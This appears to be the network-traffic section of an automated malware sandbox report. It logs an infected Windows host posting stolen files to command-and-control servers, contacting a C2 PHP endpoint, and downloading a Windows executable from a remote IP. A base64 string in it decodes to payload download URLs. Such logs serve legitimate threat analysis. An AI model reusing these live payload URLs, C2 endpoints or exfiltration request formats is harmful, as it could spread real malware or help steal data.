                                                                                                                                                                                                                                Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 75 5a 58 4a 32 4c 6d 4e 76 62 53 35 77 5a 53 39 73 5a 33 4e 6d 5a 47 46 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 63 7a 6f 76 4c 32 35 6c 63 6e 59 75 59 32 39 74 4c 6e 42 6c 4c 33 5a 6d 63 32 52 6e 5a 47 59 75 5a 58 68 6c 66 44 42 38 4d 48 78 54 64 47 46 79 64 48 77 30 66 41 3d 3d
                                                                                                                                                                                                                                Data Ascii: aHR0cHM6Ly9uZXJ2LmNvbS5wZS9sZ3NmZGFtLmV4ZXwwfDB8U3RhcnR8NHxodHRwczovL25lcnYuY29tLnBlL3Zmc2RnZGYuZXhlfDB8MHxTdGFydHw0fA==
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.082983017 CEST471OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJE
                                                                                                                                                                                                                                Host: 46.8.231.109
                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAKJEGCFBGDHJJJJJKJE--
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.582307100 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:36 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=79
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.9497425.53.124.195805828C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:13.112221003 CEST335OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary82269225
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 412
                                                                                                                                                                                                                                Host: tventyvf20pt.top
                                                                                                                                                                                                                                Sep 21, 2024 13:34:13.112241030 CEST412OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 32 32 36 39 32 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 6f 76
                                                                                                                                                                                                                                Data Ascii: ------Boundary82269225Content-Disposition: form-data; name="file"; filename="Govogica.bin"Content-Type: application/octet-streamOp``.'uRR/AbWEB@m,lkRGHA%\P@7}d]@OFjXuuSc{Sbse1;&&,
                                                                                                                                                                                                                                Sep 21, 2024 13:34:13.832648039 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:13 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                Data Raw: 4f 4b
                                                                                                                                                                                                                                Data Ascii: OK


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.9497495.53.124.195805828C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.110850096 CEST337OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary38423990
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 67973
                                                                                                                                                                                                                                Host: tventyvf20pt.top
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.110882998 CEST11124OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 38 34 32 33 39 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 61 6e
                                                                                                                                                                                                                                Data Ascii: ------Boundary38423990Content-Disposition: form-data; name="file"; filename="Banoxumik.bin"Content-Type: application/octet-streameIGB~IH;od<5,uGT|~nw8{T+cJ!sL qq'{<
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.115783930 CEST6180OUTData Raw: f4 5a f1 aa 94 54 94 b0 c4 0a 60 97 9f 1d 54 83 3b e3 48 26 5c a7 58 97 65 05 72 b5 0a b6 27 c1 07 2c 2e 87 d0 22 01 80 29 35 3b 37 77 d5 4f bf 50 34 21 40 f6 23 71 38 08 3c 7e 6f 9a 28 41 c0 b4 45 03 e0 d4 17 6a b5 22 13 0d 85 fd a0 09 25 42 95
                                                                                                                                                                                                                                Data Ascii: ZT`T;H&\Xer',.")5;7wOP4!@#q8<~o(AEj"%B&xyHJn@8[Orik")|[)VFBzZiwoF2"QCMp$40MV2KF}fHXIP2O'!%i"(BGCBo96G`rh
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.115886927 CEST4944OUTData Raw: 9f fe dc ab b4 b3 88 75 32 da ec 06 2a 21 14 b2 17 e3 bb 31 b3 bd 8e cb 90 05 a7 b8 03 c7 66 48 d6 15 e4 86 77 23 fd 8c 38 68 4e b4 45 b8 71 b0 81 ad dc 1f 08 b8 b1 69 23 66 66 64 3b e4 b5 1e a8 b4 4b 97 c5 64 52 5e e7 b1 6c c7 8a 7f fa 16 d6 01
                                                                                                                                                                                                                                Data Ascii: u2*!1fHw#8hNEqi#ffd;KdR^lF_+U0J}Lfx5^BJ(D,[U'p<Rg6\+z" rLDU;m%CP]<=YV$xC^lgk||"2|Zw}!vp|')H7
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.116231918 CEST4944OUTData Raw: 89 b0 08 12 c1 2f 2d b9 22 00 cc 6f 9b f3 5c 6a 39 10 d6 50 89 68 32 72 74 f0 25 fd ba 9d 04 0a 58 e9 a5 7d 3f 80 9c b9 64 47 fb 50 c6 e4 2e f1 f2 7c d5 b4 a2 5b b9 3e 83 38 ee 46 64 39 e7 84 ac 4b f6 15 a6 de 5f 44 cd e9 c2 31 57 24 4f 82 2e e1
                                                                                                                                                                                                                                Data Ascii: /-"o\j9Ph2rt%X}?dGP.|[>8Fd9K_D1W$O.')Ph6U70%z.;ijQnc^b~HH_\`obCWKO|]~L*UdW=y/,<{+~)(FhVMKBTAE~%:]!OeK}[c}
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.116265059 CEST4944OUTData Raw: ae 22 e9 46 3b fa 10 64 aa 1f 23 16 ea 86 9f 45 46 8a 01 76 1d 27 b0 24 01 66 c2 10 cf 28 9d 2c cf c8 37 a0 94 bd 22 28 7d 7a a8 f4 fe d2 cb d2 02 be f4 d1 05 fa 16 14 6c 7d 04 a6 43 af fc b9 6d 42 73 db 16 33 f5 ec 64 36 0f 5f f7 55 12 a7 93 1b
                                                                                                                                                                                                                                Data Ascii: "F;d#EFv'$f(,7"(}zl}CmBs3d6_UKu6&i!>*65KAw*@AeD)RdL,FxeZHpB2j4ftbm:}U\b'r)Gu#3"Gj|2!U3R;
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.116322994 CEST1236OUTData Raw: 50 ed 53 68 23 f2 9f 6b 09 a0 54 b8 08 03 67 8a 0d 6a 2b 6b 25 de eb 65 95 69 36 8d 8d d5 0c 42 d7 c5 5e 36 d9 b5 46 b5 4d d3 6b 2e ff 33 ee 8a fb 1c 60 94 b4 38 a8 c7 1a 50 49 40 db 65 06 08 09 03 02 b7 4c 59 2a 9a 61 dd 0d ad d3 87 59 dc 3d a4
                                                                                                                                                                                                                                Data Ascii: PSh#kTgj+k%ei6B^6FMk.3`8PI@eLY*aY=/G"`81jY=|<eT'hp^W~9]is%-Fj`A!r.>EEvoEB$W<-jB]o]X:$"5f1J<s1c)S%y
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.120822906 CEST3708OUTData Raw: 58 02 6a 9b 63 15 72 03 05 74 c3 65 5f 82 c7 15 2f a3 af 70 a7 3e ae 4e 28 a5 44 35 e1 01 c2 1d 58 6f 5a 98 89 f3 06 82 54 88 6f a7 f2 50 67 f5 fb 36 50 e3 43 74 1a 52 4a 4c 3e cd 93 fb d9 84 b8 c8 63 03 29 91 1c ff bc 69 ef b8 d0 a8 28 0b 8c 9b
                                                                                                                                                                                                                                Data Ascii: Xjcrte_/p>N(D5XoZToPg6PCtRJL>c)i(ejuCd*kk-ns~LJj\9}7{R@@WJ<iW-A&Rs[Is^$sj^9jc\L|n=>7_Rzk
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.120836020 CEST1236OUTData Raw: a0 3d 8a 90 6e c3 12 f8 a0 dd e2 e7 5d 98 62 74 f1 e3 d5 fe 86 3f a1 b3 6c 7e 6d 25 28 40 0e 4d 61 8b ad 68 96 87 cb c7 9c 32 59 e4 91 10 93 dc e3 0c 56 f1 21 13 18 3f b5 90 6c dc 77 6f 2a 3e 53 cc 66 a8 a0 dd fc 84 51 b5 e5 fa ab 11 c4 2e 3e e4
                                                                                                                                                                                                                                Data Ascii: =n]bt?l~m%(@Mah2YV!?lwo*>SfQ.>Gf EO^ABVe.gnS78(898V|J@nY5.d^[5g.V[sak%lr-"pKf*8|v@/JmfT~,k}
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.120866060 CEST2472OUTData Raw: e7 2f e1 36 e4 cc dc 12 db 6c 30 2b d2 f2 f8 0f da 4e 3a 6f ea 8d d1 31 ee 03 2d 74 0c ed 4d 15 c1 7d 7e 23 24 f2 58 b4 e7 cb ce 66 17 38 19 e9 86 71 19 9a 10 0e 44 bc 2b 3c 00 d8 92 7d a6 7b da 78 e1 5e 41 0b ff 98 8a 79 12 93 5e a1 53 71 44 04
                                                                                                                                                                                                                                Data Ascii: /6l0+N:o1-tM}~#$Xf8qD+<}{x^Ay^SqD;.+4Tj&7DZ7do2N0@p=yL:-N]Ya9IWTToS<0nOo8K*Z/.:]Z o+vT=oWOtB
                                                                                                                                                                                                                                Sep 21, 2024 13:34:28.120915890 CEST1236OUTData Raw: 14 cb 3e ac 5b 97 8d 5d af 58 a0 2e 62 46 6b e3 0c f7 58 e0 7b b8 55 f6 20 64 c6 ab a0 23 98 e1 ef fb d7 67 61 f7 2e 31 c0 5b 89 c9 19 b1 b1 54 15 13 ee 0a 75 39 71 80 35 b6 8e 0c 2c d8 88 eb 9c 65 6a 3a ad f7 b0 57 74 31 2c 09 d4 e6 83 1c 67 3e
                                                                                                                                                                                                                                Data Ascii: >[]X.bFkX{U d#ga.1[Tu9q5,ej:Wt1,g>?Z"$M!`mN*Jw}?Cy1G~f`D\hC|_iM!N7P"OC6<gfK=O?n}0IE`3n],m!'s<nW:
                                                                                                                                                                                                                                Sep 21, 2024 13:34:29.032005072 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:28 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                Data Raw: 4f 4b
                                                                                                                                                                                                                                Data Ascii: OK


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.9497565.53.124.195805828C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.638325930 CEST337OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----Boundary32946194
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 30036
                                                                                                                                                                                                                                Host: tventyvf20pt.top
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.638405085 CEST11124OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 32 39 34 36 31 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 61 6c
                                                                                                                                                                                                                                Data Ascii: ------Boundary32946194Content-Disposition: form-data; name="file"; filename="Paladivo.bin"Content-Type: application/octet-streamUv3![8;u&~*J^.l*$b{oC#*7$UduI.}^8q#%c)Q!6Abar^Y
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643594980 CEST1236OUTData Raw: 6c ac 1c a7 c2 64 fc e8 21 97 bc 4a 2d 3b 15 7f 16 13 29 d5 bd b6 bb dc ed cb 24 3a 06 eb 18 8f ab 4d 1d a7 8a 72 2c 9e 36 57 86 78 45 74 5a c9 86 ee 7f 1d ce 43 6d 2f 9b af 2c 9e 3d 7c 96 0a 9a 15 33 00 3d b9 b9 2d 46 73 36 38 7d 11 80 c1 d1 cd
                                                                                                                                                                                                                                Data Ascii: ld!J-;)$:Mr,6WxEtZCm/,=|3=-Fs68}t50#&"PgFZ.Fs~?R_DWOf-$qWX<?Tnl+qG=z,cZUi%i;AJ#,'DXqglX*~=:"FaI= 0p&?9
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643627882 CEST2472OUTData Raw: 10 3b b0 05 46 69 fd 31 9e 32 33 3e 35 96 e8 ac f8 fa e5 3d c1 5e 20 fc e4 43 6d 02 d3 67 94 a7 a7 0b da a7 9f ac b5 94 cf f0 0f 1a c1 7c 99 a8 69 05 af 2a f9 38 2d 44 d1 9a 41 73 2c 9b e9 ba 91 7e 89 e9 44 8e 10 76 ea bb 0f c6 a7 29 cb b6 32 49
                                                                                                                                                                                                                                Data Ascii: ;Fi123>5=^ Cmg|i*8-DAs,~Dv)2I@VPT9z>DfW2S#{2\Fw;>n[MirGwj)vkE^eSyc]x1IXC(Jr-
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643651962 CEST2472OUTData Raw: ac eb 86 f6 5d 82 c2 24 cd 5f 64 c1 67 9b eb 59 bf a2 7e 63 11 d6 5b 48 6a bc 81 0e 88 09 05 8a e0 63 ea c3 60 47 04 58 e1 39 68 cb 1e 70 1b c0 bd d9 e8 b9 72 98 7b ac d2 f1 ff 72 34 ee 08 9d 80 6a 91 17 cf 57 b9 a5 28 e7 88 d1 a7 4b 0e 43 19 d3
                                                                                                                                                                                                                                Data Ascii: ]$_dgY~c[Hjc`GX9hpr{r4jW(KCSb&>ytF)c)U.!hF<Xk<JX[mtv GMcN7W/e`!`Hncj5MYR@z#;^TQ;W~
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643688917 CEST2472OUTData Raw: db 83 96 f1 82 ad c1 c8 60 71 e9 37 05 20 c0 68 48 0f 2d 69 ff 65 1d 10 fb d8 2e 97 1b 71 c4 0d 9e 5d bc c7 37 1e 76 76 7f b7 2d 20 25 5d 86 5c 26 c6 db 8d d1 fc cb 0f a3 ad d7 71 84 73 06 ae e4 74 dd 1a a7 af c8 d9 73 7a c5 a6 a0 84 1f 7d 87 32
                                                                                                                                                                                                                                Data Ascii: `q7 hH-ie.q]7vv- %]\&qstsz}2}#8Nst^4Ws6$#"aoj!-mw,EX`<5POoQ )8q[/9aBrnTr=pdJ\TH?E6Z{M-fc
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643734932 CEST2472OUTData Raw: 5f af aa 4f d8 57 08 62 b7 cd a1 95 a8 6b a5 b5 c0 37 54 0e ff c2 09 60 b4 23 fe c7 b7 57 e6 90 d3 d9 fd bf 21 18 e4 c7 63 22 73 fc 0e 9d d4 b4 aa 90 73 a9 fb 66 fd 73 43 da d9 8c f6 9d 3e e9 87 bf 2c 70 e2 0e 8a 32 aa b2 b1 3a 0c 3a 4f c5 21 96
                                                                                                                                                                                                                                Data Ascii: _OWbk7T`#W!c"ssfsC>,p2::O!-\K%Y;q9iDo9}8a/r=<^,jul@PRI%$ `}hGk;gjHa*7/?f9U0&hJyp:B~'7I
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643752098 CEST4944OUTData Raw: 67 c0 73 77 01 63 1a b9 c5 60 96 d2 b0 48 62 3b 4b 4e 38 95 5b f1 98 e3 8f de 86 e0 59 b0 1b 76 2b be 34 c6 c4 4c ca 17 63 43 f3 47 88 f2 f2 e2 68 e2 f3 10 7c 60 e8 cd f1 6f 49 69 de 5a 79 51 9b e7 c3 74 79 bf 47 bc cc b9 30 c8 d0 32 3c b8 bf 42
                                                                                                                                                                                                                                Data Ascii: gswc`Hb;KN8[Yv+4LcCGh|`oIiZyQtyG02<B]w$wzdksItF6<Y~Z4iXo~M4Z[9cFfIqu"b(+ACGO!cSd{ASn{~y
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643776894 CEST2472OUTData Raw: 8e d2 0d e1 4a 74 5e 62 62 a6 44 5b fa 01 12 c2 c7 05 ef 84 cf 5c 46 2c b0 68 d1 5c 1f 46 c1 bd 0e 78 50 eb 47 63 ec 79 95 de 4e 0e a6 4a b1 3d 47 6f 1a 9e dd b5 9a 71 c5 db 47 13 13 90 a2 bb 8c ce 6c a2 fa 64 ea ef 26 b4 12 c5 71 ea 46 81 02 a7
                                                                                                                                                                                                                                Data Ascii: Jt^bbD[\F,h\FxPGcyNJ=GoqGld&qFHMdvgNAqkIl\L^:tu1[u4P-+e,:#wdETKC/D=D@&o5dHH-uXefBACM_f#19)6
                                                                                                                                                                                                                                Sep 21, 2024 13:34:36.643810987 CEST372OUTData Raw: 21 2d b6 5c 68 a7 0c 7f 20 40 85 53 b2 9e 6a 32 74 66 41 c9 2d 2b 21 7c 9a 2c bc 9d 33 3d 81 e1 ed 03 0f 3d ca 82 ca 9f 56 b6 01 59 16 cf 0b a3 66 82 5e 24 bd 42 cc 56 d2 c7 8c ed d5 fc bd c8 fc fa b7 86 ed 20 e4 2a 15 2e 25 4f bb 6d 1b b7 ed 09
                                                                                                                                                                                                                                Data Ascii: !-\h @Sj2tfA-+!|,3==VYf^$BV *.%OmB~sVeOk0<ab"tpbkn> \H{TGGDZ-WpLE]!lY`BDULIwZ]S~kc(HO%_lM
                                                                                                                                                                                                                                Sep 21, 2024 13:34:37.402915001 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:34:37 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                Data Raw: 4f 4b
                                                                                                                                                                                                                                Data Ascii: OK


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                21192.168.2.94976792.119.114.16980
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:34:53.963891029 CEST18OUTData Raw: ad da ba ab 06 00 00 00 16 27 00 00 1a 15 10 1c 17 0d
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:54.376733065 CEST36INData Raw: ad da ba ab 18 00 00 00 12 27 00 00 1a 0a 4f 33 20 0b 20 4d 3b 4d 4d 2c 1d 0f 4c 49 10 35 21 80 0c 18 03 37
                                                                                                                                                                                                                                Data Ascii: 'O3 M;MM,LI5!7
                                                                                                                                                                                                                                Sep 21, 2024 13:34:54.502362967 CEST76INData Raw: ad da ba ab 40 00 00 00 17 27 00 00 1b 48 4c 1b 1d 1b 49 18 4d 1d 4e 1f 4b 4f 4c 1a 1f 4d 1c 1d 4e 1a 4d 4f 4f 4f 41 1f 4d 1a 18 4b 4d 4e 4a 4d 4e 1a 18 4b 1a 1c 4d 18 4e 4f 41 40 1a 1b 41 1d 1b 1b 4b 4c 41 4f 4a 1f 4b 40 4d 18
                                                                                                                                                                                                                                Data Ascii: @'HLIMNKOLMNMOOOAMKMNJMNKMNOA@AKLAOJK@M
                                                                                                                                                                                                                                Sep 21, 2024 13:34:54.608330965 CEST12OUTData Raw: ad da ba ab 00 00 00 00 14 27 00 00
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:54.783862114 CEST23INData Raw: ad da ba ab 0b 00 00 00 15 27 00 00 41 57 4d 4f 57 48 4b 4a 57 4a 4a
                                                                                                                                                                                                                                Data Ascii: 'AWMOWHKJWJJ
                                                                                                                                                                                                                                Sep 21, 2024 13:34:57.969247103 CEST12OUTData Raw: ad da ba ab 00 00 00 00 10 27 00 00
                                                                                                                                                                                                                                Data Ascii: '
                                                                                                                                                                                                                                Sep 21, 2024 13:34:58.151632071 CEST12INData Raw: ad da ba ab 00 00 00 00 11 27 00 00
                                                                                                                                                                                                                                Data Ascii: '


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.949790147.45.44.104805752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.325340986 CEST194OUTGET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885531902 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:34 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 363424
                                                                                                                                                                                                                                Last-Modified: Thu, 19 Sep 2024 23:31:32 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ecb454-58ba0"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf2~Q `@ `,QO`xe(&O H.text1 2 `.rsrc`4@@.reloc:@B`QHAVeOz?Z#btHxK+,57>1G2%ju-EmRU-6W4bW5>B] sf'(o}kPq>j][T.sp}HT-o8.^pK7?ntEK>^8p+bW{:SjZzd2i65u|vUy1#6P}$K\X$ZDXqK^I>Ljv-H-KEG)r
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885550976 CEST224INData Raw: b2 43 8e 2c 79 2d 5e 36 8d b2 90 cf f2 d9 15 8d 12 89 0b 18 7e 4d 4a 29 8b 27 c0 ea d3 0f 4b a4 cb 09 9b 22 70 d5 35 b8 f3 cb 39 f6 9a de 41 af 93 30 89 d5 97 73 43 55 c3 db 3d a6 ec 1f e1 03 ef 9c f7 46 59 79 b1 b1 19 42 0c b5 77 eb d9 c9 7e b0
                                                                                                                                                                                                                                Data Ascii: C,y-^6~MJ)'K"p59A0sCU=FYyBw~JqF:Yt;<b2D/.r}q~PcS)4&/cWHJ\q%QEdIjh*^*qYaadn/ny)w,HDQ<(Z}hkU
                                                                                                                                                                                                                                Sep 21, 2024 13:35:34.885562897 CEST1236INData Raw: 1f f4 fb 97 6b b7 d0 ff 04 08 72 2e 34 22 6c f9 16 42 40 46 5b 13 53 fc 19 08 33 f0 14 df ec 73 e7 72 75 0b 5f ca 2b de 38 b2 2c 4f f0 73 b8 21 ae d5 df 3e af cb 74 9d 75 67 ae bd 2b 9e 40 c8 18 0c 82 3e f5 20 c3 1a 92 81 fd 30 3a 23 2a 67 6f b1
                                                                                                                                                                                                                                Data Ascii: kr.4"lB@F[S3sru_+8,Os!>tug+@> 0:#*go?$cLbZ&ve@(k,E*D,#e( bx^V!'"AQVn72HSm[sBND~Y@%s182]fs9RV*F bG70
